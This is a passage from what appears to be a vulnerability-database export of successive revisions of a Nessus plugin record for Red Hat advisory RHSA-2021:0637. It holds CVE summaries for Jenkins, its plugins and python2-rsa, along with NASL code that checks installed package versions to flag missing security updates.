allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'jenkins / jenkins-2-plugins / python2-rsa');\n}\n", "naslFamily": "Red Hat Local Security Checks", "cpe": ["cpe:/a:redhat:openshift:3.11", "p-cpe:/a:redhat:enterprise_linux:jenkins", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:python2-rsa", "p-cpe:/a:redhat:enterprise_linux:jenkins-2-plugins"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-03-25T13:49:00", "differentElements": ["cpe", "sourceData"], "edition": 3}, {"bulletin": {"id": "REDHAT-RHSA-2021-0637.NASL", "hash": "25152af5e45a57b5228bb559c179447b93d632a2d2af56652d9eac7108e5dadb", "type": "nessus", "bulletinFamily": "scanner", "title": "RHEL 7 : OpenShift Container Platform 3.11.394 bug fix and (RHSA-2021:0637)", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0637 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2304)\n\n - jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2305)\n\n - jenkins-2-plugins/mercurial: Missing permission check in an HTTP endpoint could result in information\n disclosure (CVE-2020-2306)\n\n - jenkins-2-plugins/kubernetes: Jenkins controller environment variables are accessible in Kubernetes Plugin\n (CVE-2020-2307)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows listing pod templates\n (CVE-2020-2308)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows enumerating credentials\n IDs (CVE-2020-2309)\n\n - python-rsa: bleichenbacher timing oracle attack against RSA decryption (CVE-2020-25658)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "published": "2021-03-03T00:00:00", "modified": "2021-03-03T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cvss2": {}, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "href": "https://www.tenable.com/plugins/nessus/147013", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://access.redhat.com/security/cve/CVE-2020-2307", "https://access.redhat.com/security/cve/CVE-2020-2304", "https://access.redhat.com/security/cve/CVE-2020-1945", "https://access.redhat.com/security/cve/CVE-2020-2305", "https://access.redhat.com/security/cve/CVE-2020-25658", "https://bugzilla.redhat.com/1895947", "https://bugzilla.redhat.com/1889972", "https://access.redhat.com/security/cve/CVE-2020-2308", "https://bugzilla.redhat.com/1895945", "https://bugzilla.redhat.com/1895941", "https://access.redhat.com/security/cve/CVE-2020-11979", "https://cwe.mitre.org/data/definitions/862.html", "https://access.redhat.com/security/cve/CVE-2020-2309", "https://cwe.mitre.org/data/definitions/377.html", "https://bugzilla.redhat.com/1895939", "https://bugzilla.redhat.com/1895940", "https://cwe.mitre.org/data/definitions/611.html", "https://bugzilla.redhat.com/1837444", "https://cwe.mitre.org/data/definitions/200.html", "https://access.redhat.com/security/cve/CVE-2020-2306", "https://access.redhat.com/errata/RHSA-2021:0637", "https://bugzilla.redhat.com/1895946", "https://cwe.mitre.org/data/definitions/385.html", "https://bugzilla.redhat.com/1903702"], "cvelist": ["CVE-2020-2308", "CVE-2020-2304", "CVE-2020-2307", "CVE-2020-2306", "CVE-2020-2305", "CVE-2020-25658", "CVE-2020-11979", "CVE-2020-1945", "CVE-2020-2309"], "immutableFields": [], "lastseen": "2021-04-16T03:09:17", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"modified": "2021-04-16T03:09:17", "references": [{"idList": ["USN-4380-1"], "type": "ubuntu"}, {"idList": ["OPENVAS:1361412562310877939", "OPENVAS:1361412562310844454", "OPENVAS:1361412562310877930"], "type": "openvas"}, {"idList": ["ASA-202005-15", "ASA-202012-5"], "type": "archlinux"}, {"idList": ["REDHAT-RHSA-2021-0038.NASL", "GENTOO_GLSA-202011-18.NASL", "PHOTONOS_PHSA-2020-2_0-0291_APACHE.NASL", "EULEROS_SA-2021-1133.NASL", "FEDORA_2020-92B1D001B3.NASL", "PHOTONOS_PHSA-2020-3_0-0155_APACHE.NASL", "REDHAT-RHSA-2021-0034.NASL", "FEDORA_2020-3CE0F55BC5.NASL", "FEDORA_2020-2640AA4E19.NASL", "PHOTONOS_PHSA-2020-1_0-0335_APACHE.NASL"], "type": "nessus"}, {"idList": ["RHSA-2021:0429", "RHSA-2021:0037", "RHSA-2021:0282", "RHSA-2021:0637", "RHSA-2021:0423", "RHSA-2021:0719", "RHSA-2020:2618", "RHSA-2021:0039", "RHSA-2021:0034", "RHSA-2021:0038"], "type": "redhat"}, {"idList": ["OPENSUSE-SU-2020:1022-1"], "type": "suse"}, {"idList": ["CVE-2020-2308", "CVE-2020-2304", "CVE-2020-2307", "CVE-2020-2306", "CVE-2020-2305", "CVE-2020-25658", "CVE-2020-11979", "CVE-2020-1945", "CVE-2020-2309"], "type": "cve"}, {"idList": ["FEDORA:52396606732B", "FEDORA:6869030D3139", "FEDORA:146FE30DD5E7", "FEDORA:2D51F60C28B2", "FEDORA:88EAA30905CF"], "type": "fedora"}, {"idList": ["ORACLE:CPUJUL2020", "ORACLE:CPUAPR2021", "ORACLE:CPUOCT2020", "ORACLE:CPUJAN2021"], "type": "oracle"}, {"idList": ["GHSA-F62V-XPXF-3V68", "GHSA-XRX6-FMXQ-RJJ2", "GHSA-4P6W-M9WC-C9C9"], "type": "github"}, {"idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"], "type": "freebsd"}, {"idList": ["GLSA-202007-34", "GLSA-202011-18"], "type": "gentoo"}, {"idList": ["UB:CVE-2020-25658", "UB:CVE-2020-11979", "UB:CVE-2020-1945"], "type": "ubuntucve"}, {"idList": ["RH:CVE-2020-2304", "RH:CVE-2020-25658", "RH:CVE-2020-2305", "RH:CVE-2020-2308", "RH:CVE-2020-2306", "RH:CVE-2020-2307", "RH:CVE-2020-2309", "RH:CVE-2020-11979", "RH:CVE-2020-1945"], "type": "redhatcve"}], "rev": 2}, "score": {"modified": "2021-04-16T03:09:17", "rev": 2, "value": 6.3, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "147013", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0637. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147013);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/15\");\n\n script_cve_id(\n \"CVE-2020-1945\",\n \"CVE-2020-2304\",\n \"CVE-2020-2305\",\n \"CVE-2020-2306\",\n \"CVE-2020-2307\",\n \"CVE-2020-2308\",\n \"CVE-2020-2309\",\n \"CVE-2020-11979\",\n \"CVE-2020-25658\"\n );\n script_xref(name:\"RHSA\", value:\"2021:0637\");\n script_xref(name:\"CWE\", value:\"200\");\n script_xref(name:\"CWE\", value:\"377\");\n script_xref(name:\"CWE\", value:\"385\");\n script_xref(name:\"CWE\", value:\"611\");\n script_xref(name:\"CWE\", value:\"862\");\n\n script_name(english:\"RHEL 7 : OpenShift Container Platform 3.11.394 bug fix and (RHSA-2021:0637)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0637 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2304)\n\n - jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2305)\n\n - jenkins-2-plugins/mercurial: Missing permission check in an HTTP endpoint could result in information\n disclosure (CVE-2020-2306)\n\n - jenkins-2-plugins/kubernetes: Jenkins controller environment variables are accessible in Kubernetes Plugin\n (CVE-2020-2307)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows listing pod templates\n (CVE-2020-2308)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows enumerating credentials\n IDs (CVE-2020-2309)\n\n - python-rsa: bleichenbacher timing oracle attack against RSA decryption (CVE-2020-25658)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/200.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/377.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/385.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/611.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/862.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2304\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2305\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2306\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2307\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2308\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2309\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-11979\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-25658\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0637\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1837444\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1889972\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895939\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895940\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895941\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895946\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895947\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1903702\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected jenkins, jenkins-2-plugins and / or python2-rsa packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11979\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(200, 377, 385, 611, 862);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins-2-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-rsa\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '7')) audit(AUDIT_OS_NOT, 'Red Hat 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'openshift_3_11_el7': [\n 'rhel-7-server-ose-3.11-debug-rpms',\n 'rhel-7-server-ose-3.11-rpms',\n 'rhel-7-server-ose-3.11-source-rpms'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2021:0637');\n}\n\npkgs = [\n {'reference':'jenkins-2-plugins-3.11.1612862361-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']},\n {'reference':'jenkins-2.263.3.1612433584-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']},\n {'reference':'python2-rsa-4.5-3.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'jenkins / jenkins-2-plugins / python2-rsa');\n}\n", "naslFamily": "Red Hat Local Security Checks", "cpe": ["p-cpe:/a:redhat:enterprise_linux:jenkins", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:python2-rsa", "p-cpe:/a:redhat:enterprise_linux:jenkins-2-plugins"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-04-16T03:09:17", "differentElements": ["cvelist", "description", "references", "sourceData"], "edition": 4}, {"bulletin": {"id": "REDHAT-RHSA-2021-0637.NASL", "hash": "b5dcae0977cc4b034f197f64c7171493c910ddb85a4bb15d1e64db480e4f75a3", "type": "nessus", "bulletinFamily": "scanner", "title": "RHEL 7 : OpenShift Container Platform 3.11.394 bug fix and (RHSA-2021:0637)", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0637 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2304)\n\n - jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2305)\n\n - jenkins-2-plugins/mercurial: Missing permission check in an HTTP endpoint could result in information\n disclosure (CVE-2020-2306)\n\n - jenkins-2-plugins/kubernetes: Jenkins controller environment variables are accessible in Kubernetes Plugin\n (CVE-2020-2307)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows listing pod templates\n (CVE-2020-2308)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows enumerating credentials\n IDs (CVE-2020-2309)\n\n - python-rsa: bleichenbacher timing oracle attack against RSA decryption (CVE-2020-25658)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "published": "2021-03-03T00:00:00", "modified": "2021-03-03T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cvss2": {}, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "href": "https://www.tenable.com/plugins/nessus/147013", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://access.redhat.com/security/cve/CVE-2020-2307", "https://access.redhat.com/security/cve/CVE-2021-21610", "https://cwe.mitre.org/data/definitions/79.html", "https://access.redhat.com/security/cve/CVE-2021-21602", "https://bugzilla.redhat.com/1925143", "https://access.redhat.com/security/cve/CVE-2020-2304", "https://cwe.mitre.org/data/definitions/863.html", "https://bugzilla.redhat.com/1925156", "https://access.redhat.com/security/cve/CVE-2020-1945", "https://access.redhat.com/security/cve/CVE-2020-2305", "https://access.redhat.com/security/cve/CVE-2020-25658", "https://bugzilla.redhat.com/1895947", "https://bugzilla.redhat.com/1925145", "https://cwe.mitre.org/data/definitions/770.html", "https://access.redhat.com/security/cve/CVE-2021-21611", "https://bugzilla.redhat.com/1889972", "https://cwe.mitre.org/data/definitions/20.html", "https://access.redhat.com/security/cve/CVE-2021-21607", "https://access.redhat.com/security/cve/CVE-2021-21606", "https://bugzilla.redhat.com/1925159", "https://access.redhat.com/security/cve/CVE-2020-2308", "https://access.redhat.com/security/cve/CVE-2021-21604", "https://access.redhat.com/security/cve/CVE-2021-21603", "https://bugzilla.redhat.com/1925160", "https://bugzilla.redhat.com/1895945", "https://bugzilla.redhat.com/1895941", "https://access.redhat.com/security/cve/CVE-2020-11979", "https://cwe.mitre.org/data/definitions/862.html", "https://access.redhat.com/security/cve/CVE-2021-21609", "https://access.redhat.com/security/cve/CVE-2020-2309", "https://cwe.mitre.org/data/definitions/377.html", "https://bugzilla.redhat.com/1925141", "https://cwe.mitre.org/data/definitions/59.html", "https://bugzilla.redhat.com/1895939", "https://bugzilla.redhat.com/1895940", "https://cwe.mitre.org/data/definitions/502.html", "https://cwe.mitre.org/data/definitions/611.html", "https://bugzilla.redhat.com/1837444", "https://cwe.mitre.org/data/definitions/200.html", "https://access.redhat.com/security/cve/CVE-2021-21608", "https://bugzilla.redhat.com/1925161", "https://bugzilla.redhat.com/1925157", "https://bugzilla.redhat.com/1925140", "https://bugzilla.redhat.com/1925151", "https://access.redhat.com/security/cve/CVE-2020-2306", "https://access.redhat.com/errata/RHSA-2021:0637", "https://bugzilla.redhat.com/1895946", "https://cwe.mitre.org/data/definitions/385.html", "https://bugzilla.redhat.com/1903702", "https://access.redhat.com/security/cve/CVE-2021-21605"], "cvelist": ["CVE-2020-2308", "CVE-2021-21609", "CVE-2021-21607", "CVE-2020-2304", "CVE-2021-21608", "CVE-2021-21606", "CVE-2020-2307", "CVE-2020-2306", "CVE-2021-21604", "CVE-2020-2305", "CVE-2020-25658", "CVE-2020-11979", "CVE-2020-1945", "CVE-2021-21602", "CVE-2021-21603", "CVE-2021-21610", "CVE-2020-2309", "CVE-2021-21611", "CVE-2021-21605"], "immutableFields": [], "lastseen": "2021-07-27T03:33:23", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"modified": "2021-07-27T03:33:23", "references": [{"idList": ["USN-4380-1"], "type": "ubuntu"}, {"idList": ["OPENVAS:1361412562310877939", "OPENVAS:1361412562310844454", "OPENVAS:1361412562310877930"], "type": "openvas"}, {"idList": ["RH:CVE-2020-2304", "RH:CVE-2021-21606", "RH:CVE-2021-21605", "RH:CVE-2021-21602", "RH:CVE-2020-25658", "RH:CVE-2020-2305", "RH:CVE-2021-21611", "RH:CVE-2020-2308", "RH:CVE-2020-2306", "RH:CVE-2021-21609", "RH:CVE-2020-2307", "RH:CVE-2021-21607", "RH:CVE-2021-21603", "RH:CVE-2020-2309", "RH:CVE-2021-21608", "RH:CVE-2021-21604", "RH:CVE-2020-11979", "RH:CVE-2020-1945", "RH:CVE-2021-21610"], "type": "redhatcve"}, {"idList": ["RHSA-2021:0429", "RHSA-2021:0037", "RHSA-2021:0282", "RHSA-2021:0637", "RHSA-2021:0423", "RHSA-2021:0719", "RHSA-2020:2618", "RHSA-2021:0039", "RHSA-2021:0034", "RHSA-2021:0038"], "type": "redhat"}, {"idList": ["OPENSUSE-SU-2020:1022-1"], "type": "suse"}, {"idList": ["FEDORA:52396606732B", "FEDORA:6869030D3139", "FEDORA:146FE30DD5E7", "FEDORA:2D51F60C28B2", "FEDORA:88EAA30905CF"], "type": "fedora"}, {"idList": ["REDHAT-RHSA-2021-0038.NASL", "GENTOO_GLSA-202011-18.NASL", "PHOTONOS_PHSA-2020-2_0-0291_APACHE.NASL", "EULEROS_SA-2021-1133.NASL", "FEDORA_2020-92B1D001B3.NASL", "FREEBSD_PKG_D6F76976E86D4F9A936276C849B10DB2.NASL", "REDHAT-RHSA-2021-0034.NASL", "JENKINS_2_274.NASL", "REDHAT-RHSA-2021-0423.NASL", "REDHAT-RHSA-2021-0429.NASL"], "type": "nessus"}, {"idList": ["CVE-2021-21609", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21606", "CVE-2021-21604", "CVE-2021-21602", "CVE-2021-21603", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21605"], "type": "cve"}, {"idList": ["GHSA-F62V-XPXF-3V68", "GHSA-XRX6-FMXQ-RJJ2", "GHSA-4P6W-M9WC-C9C9"], "type": "github"}, {"idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"], "type": "freebsd"}, {"idList": ["ASA-202005-15", "ASA-202101-41", "ASA-202012-5"], "type": "archlinux"}, {"idList": ["GLSA-202007-34", "GLSA-202011-18"], "type": "gentoo"}, {"idList": ["UB:CVE-2020-25658", "UB:CVE-2020-11979", "UB:CVE-2020-1945"], "type": "ubuntucve"}], "rev": 2}, "score": {"modified": "2021-07-27T03:33:23", "rev": 2, "value": 6.9, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "147013", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0637. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147013);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/26\");\n\n script_cve_id(\n \"CVE-2020-1945\",\n \"CVE-2020-2304\",\n \"CVE-2020-2305\",\n \"CVE-2020-2306\",\n \"CVE-2020-2307\",\n \"CVE-2020-2308\",\n \"CVE-2020-2309\",\n \"CVE-2020-11979\",\n \"CVE-2020-25658\"\n );\n script_xref(name:\"RHSA\", value:\"2021:0637\");\n script_xref(name:\"IAVA\", value:\"2020-A-0324\");\n script_xref(name:\"IAVA\", value:\"2021-A-0035-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0196\");\n script_xref(name:\"IAVA\", value:\"2021-A-0039-S\");\n\n script_name(english:\"RHEL 7 : OpenShift Container Platform 3.11.394 bug fix and (RHSA-2021:0637)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0637 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2304)\n\n - jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2305)\n\n - jenkins-2-plugins/mercurial: Missing permission check in an HTTP endpoint could result in information\n disclosure (CVE-2020-2306)\n\n - jenkins-2-plugins/kubernetes: Jenkins controller environment variables are accessible in Kubernetes Plugin\n (CVE-2020-2307)\n\n - 